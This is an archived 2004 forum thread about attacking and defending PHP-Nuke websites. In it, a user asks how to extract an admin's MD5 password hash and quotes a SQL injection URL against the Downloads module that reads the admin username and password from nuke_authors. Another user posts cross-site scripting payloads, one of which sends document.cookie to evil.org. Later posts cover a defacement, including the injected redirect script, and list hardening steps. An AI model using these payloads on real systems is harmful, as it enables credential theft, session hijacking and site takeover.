 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
how to get target password's md5 hash |
 |
 Posted: Thu May 27, 2004 9:20 am |
 |
|
| Saladin |
| Regular user |
 |
|
| Joined: May 26, 2004 |
| Posts: 19 |
|
|
|
 |
|
 |
|
how can i get password md5 from phpnuke web sites
i only know one way to get md5 through Downloads Module,
here is your http://www.waraxe.us/?modname=sa&id=027 report
modules.php?name=Downloads&d_op=viewsdownload&sid=-1/**/UNION/**/SELECT/**/0,0,aid,pwd,0,0, 0,0,0,0,0,0/**/FROM/**/nuke_authors/**/WHERE/ **/radminsuper=1/**/LIMIT/**/1/*
is there other ways to get md5?
what is if the Downloads Module is not avaiable or is not active? Can i get md5 through other Modules?
@waraxe, help me please, it is so important |
|
|
|
|
|
xss code here |
|
| Posted: Thu May 27, 2004 10:13 am |
|
|
| Saladin |
| Regular user |
|
|
| Joined: May 26, 2004 |
| Posts: 19 |
|
|
|
|
|
|
|
An other Question,
[xss code here] ( you always write in your texts,but you give no examples)
What a code is that? maybe you write some examples? |
|
|
|
|
|
*sigh* |
|
| Posted: Thu May 27, 2004 10:33 am |
|
|
| icenix |
| Advanced user |
|
|
| Joined: May 13, 2004 |
| Posts: 106 |
| Location: Australia |
|
|
|
|
|
|
googles the best friend here, once again ...
search for XSS Codes or stuff like that
or make your own...
if the <script> tags arenot blocked then you could parse something like
| Code: |
shit'><script>alert(document.cookie)</script>
|
if that gets blocked then you can always retry the same sort of query
which will give you:
| Code: |
foobar'><body onload=alert(document.cookie);>
|
or be creative...
| Code: |
wateva'><img src="&{alert('CSS Vulnerable')};">
or
f00'><script>document.write('<img src="http://evil.org/'+document.cookie+'") </script>
|
experiment...
i suggest this site
Hope i helped
ice |
|
|
|
|
| Posted: Thu May 27, 2004 3:18 pm |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
|
|
|
|
|
My Site is hacked |
|
| Posted: Thu May 27, 2004 6:30 pm |
|
|
| Saladin |
| Regular user |
|
|
| Joined: May 26, 2004 |
| Posts: 19 |
|
|
|
|
|
|
|
My Site got hacked.
The hacker had changed nuke_config Table
INSERT INTO `nuke_config` VALUES ('Hacked By HotHackers Team</title><script language="Javascript">document.location.href="http://hackedby.hothackers.com/?site=mysite.org"</script>', 'http://www.mysite.org', 'logo.gif', '.......
So is this XSS ? what has the attacker used? and how he could add new code in my DB .. |
|
Last edited by Saladin on Sun May 30, 2004 7:43 pm; edited 2 times in total |
|
|
|
|
hi |
|
| Posted: Thu May 27, 2004 6:32 pm |
|
|
| Saladin |
| Regular user |
|
|
| Joined: May 26, 2004 |
| Posts: 19 |
|
|
|
|
|
|
|
and an other question, you think he has used the News Module to add JavaScript Code ?
I am not sure, but i think, my News Module is not so safe |
|
|
|
|
|
|
|
|
| Posted: Thu May 27, 2004 9:39 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
First attackers somehow were getting superadmin status (through sql injection probably). Then they just were using from administration menu
an option called "Preferences" and there were inserting "hacked" message and scripting stuff to "Site name" field. What is interesting, is that phpnuke should be filtering "<script>" tags from POST query and stop the pageload with "The html tags you attempted to use are not allowed" message.
One way to bypass that filter is using of the cookie variables to deliver the scripting stuff to phpnuke engine.
Now about defacers:
First, their WHOIS info:
Registration Service Provided By: NameCheap.comContact: support@NameCheap.comVisit: http://www.namecheap.com/ Domain name: HOTHACKERS.COMRegistrant Contact: HOTHACKERS HH TEAM (thcteam_@hotmail.com) +1.5641165647 Fax: no 955 Paris, NA 54114 FRAdministrative Contact: HOTHACKERS HH TEAM (thcteam_@hotmail.com) +1.5641165647 Fax: no 955 Paris, NA 54114 FRTechnical Contact: HOTHACKERS HH TEAM (thcteam_@hotmail.com) +1.5641165647 Fax: no 955 Paris, NA 54114 FRBilling Contact: HOTHACKERS HH TEAM (thcteam_@hotmail.com) +1.5641165647 Fax: no 955 Paris, NA 54114 FRStatus: LockedName Servers: dns1.name-services.com dns2.name-services.com dns3.name-services.com dns4.name-services.com dns5.name-services.com Creation date: 28 Dec 2003 20:00:13Expiration date: 28 Dec 2006 20:00:13
Nothing interesting, only email address for possible counteraction.
Then i was doing little research on their website and found one little flaw: "server-info" is available worldwide:
http://www.hothackers.com/server-info |
|
|
|
|
|
|
hi |
|
| Posted: Fri May 28, 2004 4:49 pm |
|
|
| Saladin |
| Regular user |
|
|
| Joined: May 26, 2004 |
| Posts: 19 |
|
|
|
|
|
|
|
Is it possible to add JavaScript without getting SuperAdmin?
i don't believe that they got superadmin
rights, i think, they have added the JavaScript Code directly or ? what dou you think?
although I had changed my password, and i had deleted the admin folder from the server, the attacker could add his javascript onLoad to link my site to other directory.. how is it possible? i deleted the admin directory, but another time my site was hacked, and the same attacker had added again the JS Code on Load |
|
_________________
Freedom for Kurdistan |
|
|
|
|
once again |
|
| Posted: Fri May 28, 2004 4:51 pm |
|
|
| Saladin |
| Regular user |
|
|
| Joined: May 26, 2004 |
| Posts: 19 |
|
|
|
|
|
|
|
Another maybe easy question, if i remove all the admin folder from the server, is it then passible to hack a phpnuke site and to add new news or JS Code ?
how can i protect my site surely? |
|
_________________
Freedom for Kurdistan |
|
|
|
|
|
|
|
| Posted: Fri May 28, 2004 5:32 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
Maybe you have installed some custom modules with security holes. For example Coppermine Photogallery. If attacker can sploit remote file inclusions, then they can do what they want - modify database, delete files, etc. And that without "admin" folder at scripts at all!
So here is my suggestion -
1. back up your database.
2. delete all scripting stuff from website (to be sure, that there are no backdoors left by crackers).
3. get yourself decently and securely patched phpnuke version.
Look at those php security related sites for download(s):
http://www.nukecops.com
http://www.karakas-online.de/forum/viewforum.php?f=1
http://protector.warcenter.se/
4. when you have installed phpnuke main part, then next try to
search add-on modules, you needed, but be sure, that they are known to be secure versions. I mean - do search on bugtraq, ask for advise in forums (like here), etc.
5. install Fortress, UnionTap, whatever you prefer, to automatically catch up the intruder, ban his ip address and send yourself email about intrusion attempt.
6. Consider to secure your admin.php script with help of the allowed/restricted ip addresses/ranges list. There are addons/mods/scripts for this, do a search on google.
7. and finally, when you have all this done, you can ask your friend or hire some IT security freak to pentest your website. |
|
|
|
|
|
|
hrmm |
|
| Posted: Sat May 29, 2004 6:40 am |
|
|
| icenix |
| Advanced user |
|
|
| Joined: May 13, 2004 |
| Posts: 106 |
| Location: Australia |
|
|
|
|
|
|
maybe change the core values of the body (etc)
and instead of
| Code: |
http://localhost.com/admin.php
|
maybe
| Code: |
http://localhost.com/secretfolder/admin.php
|
that would stop some attacks i presume?
only for Admin.php though...
modules.php would still be vulnerable and i dont see how you could masquerade that without some serious coding 
just a suggestion.... |
|
|
|
|
| Posted: Sat May 29, 2004 11:51 am |
|
|
| SteX |
| Advanced user |
 |
|
| Joined: May 18, 2004 |
| Posts: 181 |
| Location: Serbia |
|
|
|
|
|
|
|
_________________
We would change the world, but God won't give us the sourcecode...
....Watch the master. Follow the master. Be the master....
------------------------------------------------------- |
|
|
|
| Posted: Sat May 29, 2004 2:07 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| No, because only administration stuff goes to secret folder and only admins willl have to access it. All common users will not know about admin directory location at all. And if someone will know admins directory path, then probably it is relative path, not full, therefore it will be relative path disclosure |
|
|
|
|
| Posted: Tue Jun 15, 2004 9:27 am |
|
|
| wumaxtreme |
| Beginner |
|
|
| Joined: Jun 15, 2004 |
| Posts: 1 |
|
|
|
|
|
|
|
|
|
|
|
| Posted: Mon Nov 29, 2004 7:01 pm |
|
|
| Oguz |
| Regular user |
|
|
| Joined: Nov 29, 2004 |
| Posts: 7 |
|
|
|
|
|
|
|
|
|
|
|
www.waraxe.us Forum Index -> PhpNuke
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 2
Goto page 1, 2Next
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 68
Members: 0
Total: 68
